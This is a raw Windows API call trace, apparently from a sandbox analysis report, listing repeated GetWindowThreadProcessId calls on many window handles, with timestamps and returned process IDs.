	[0855.172] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x5c8
	[0855.172] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x6f8
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x358
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x73c
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xb0
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x250
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x240
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x790
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x61c
	[0855.173] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x540
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x538
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x568
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x538
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x568
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x538
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x540
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x540
	[0855.174] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x57c
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x554
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x528
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x79c
	[0855.175] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4e0
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x44c
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x778
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x460
	[0855.176] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x558
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x4d0
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2254
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2250
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16f0
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1338
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ca0
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x238c
	[0855.177] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b08
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1a8c
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18e0
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x2344
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1d8c
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1038
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1a58
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c7c
	[0855.178] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f04
	[0855.179] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18b8
	[0855.179] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x22c8
	[0855.179] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x21b8
	[0855.179] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x21c0
	[0855.179] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x219c
	[0855.179] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x20f4
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x20e4
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x20e8
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x20ec
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x20f0
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e34
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc38
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1fe4
	[0856.408] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f10
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f0c
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1f08
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ef0
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1eec
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ee4
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ed8
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1ed0
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e8c
	[0856.409] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e88
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e84
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1604
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c2c
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c08
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c0c
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c10
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c14
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c18
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c1c
	[0856.410] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16fc
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1e78
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1c20
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x191c
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1748
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1bb4
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10bc
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b50
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x14b4
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x149c
	[0856.411] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x14a8
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1490
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x14a4
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x148c
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1458
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b4c
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1b3c
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x19bc
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x199c
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1998
	[0856.412] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1994
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1990
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1984
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x197c
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1978
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1824
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1088
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1908
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18cc
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x18d0
	[0856.413] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1840
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10c4
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x128c
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16e8
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16cc
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x274
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10e0
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10cc
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10c0
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x10d0
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1198
	[0856.414] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1080
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1074
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x106c
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1474
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1414
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xbd0
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x550
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xa38
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16d0
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x16d4
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x15bc
	[0856.415] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x15a0
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x159c
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1598
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1594
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1590
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x158c
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1588
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1584
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1580
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x157c
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1488
	[0856.416] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1404
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x11b8
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xbd4
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe0c
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd30
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe70
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x13b8
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe20
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe2c
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe00
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe04
	[0856.417] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc94
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x13b0
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x13ac
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x13a8
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1374
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x132c
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1328
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12d0
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12cc
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x12c8
	[0856.418] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1290
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1218
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1214
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x11ec
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x11e8
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x11cc
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x1140
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe6c
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0x6e8
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xc6c
	[0856.419] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf94
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xffc
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf74
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf08
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf0c
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xed8
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xe90
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xea8
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfa8
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfbc
	[0856.420] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfb8
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfb4
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfb0
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfac
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfc0
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xfd0
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf88
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf84
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xf80
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xde0
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xddc
	[0856.421] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xdd8
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd34
	[0856.422] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xedca0 | out: lpdwProcessId=0xedca0) returned 0xd10
